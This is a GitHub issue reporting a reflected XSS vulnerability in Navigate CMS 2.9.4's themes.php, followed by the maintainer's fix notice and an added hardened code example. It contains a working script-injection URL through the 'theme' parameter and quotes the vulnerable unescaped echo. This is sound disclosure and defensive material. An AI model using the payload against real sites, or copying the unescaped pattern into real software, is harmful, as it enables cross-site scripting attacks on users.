NavigateCMS / Navigate-CMS

Navigate CMS, a very powerful open source content management system for everybody.
http://www.navigatecms.com
GNU General Public License v2.0

Reflected XSS attack in \lib\packages\themes\themes.php with the theme parameter in NavigateCMS 2.9.4 #29

Closed bkfish closed 2 years ago

bkfish commented 2 years ago

EXPECTED BEHAVIOUR

An authenticated malicious user can take advantage of a Reflected XSS vulnerability in the themes feature.

exp

/navigate/navigate.php?fid=themes&act=theme_info&theme=%22%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E

analysis

navigate\lib\packages\themes\themes.php, line 17, without any filter.

        case 'theme_info':
            echo '<iframe src="'.NAVIGATE_URL.'/themes/'.$_REQUEST['theme'].'/'.$_REQUEST['theme'].'.info.html'.'" scrolling="auto" frameborder="0"  width="100%" height="100%"></iframe>';
            core_terminate();
            break;

NavigateCMS commented 2 years ago

Fixed by dd2cef6c6bdb2b4dd4b2bf3b813bd8489bc23947
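
A hardened form of the `theme_info` branch quoted in the report, added here as an example; it is not Navigate CMS code and does not reproduce the referenced commit. It assumes theme directory names contain only letters, digits, `_` and `-`; the helper name `theme_info_iframe()` and the `NAVIGATE_URL` value are hypothetical.

```php
<?php
// Added example, not Navigate CMS code. NAVIGATE_URL is a constructed
// placeholder value; theme_info_iframe() is a hypothetical helper name.
const NAVIGATE_URL = 'https://cms.example/navigate';

/**
 * Build the theme info iframe, or return null when the theme name is not
 * a plain directory name.
 */
function theme_info_iframe(string $theme): ?string
{
    // 1. Allow-list (assumption): theme folders use only letters, digits,
    //    "_" and "-". This also rejects "..", "/" and "\" in the path.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $theme)) {
        return null;
    }

    // 2. Encode for the URL path segment, then for the HTML attribute context,
    //    so the output stays safe even if the allow-list is later relaxed.
    $segment = rawurlencode($theme);
    $src = NAVIGATE_URL . '/themes/' . $segment . '/' . $segment . '.info.html';
    $src = htmlspecialchars($src, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

    return '<iframe src="' . $src . '" scrolling="auto" frameborder="0" '
         . 'width="100%" height="100%"></iframe>';
}

// Constructed inputs: a normal theme name and the decoded value from the report.
$samples = ['mytheme', '"</iframe><script>alert(1)</script>'];
foreach ($samples as $theme) {
    $html = theme_info_iframe($theme);
    if ($html === null) {
        // In the request handler this would become an HTTP 400 response.
        echo 'rejected: ' . json_encode($theme) . PHP_EOL;
    } else {
        echo $html . PHP_EOL;
    }
}
```

Validation and output encoding are kept as separate steps on purpose: the allow-list decides what is a legitimate theme name, while `htmlspecialchars()` is what keeps the value inside the `src` attribute.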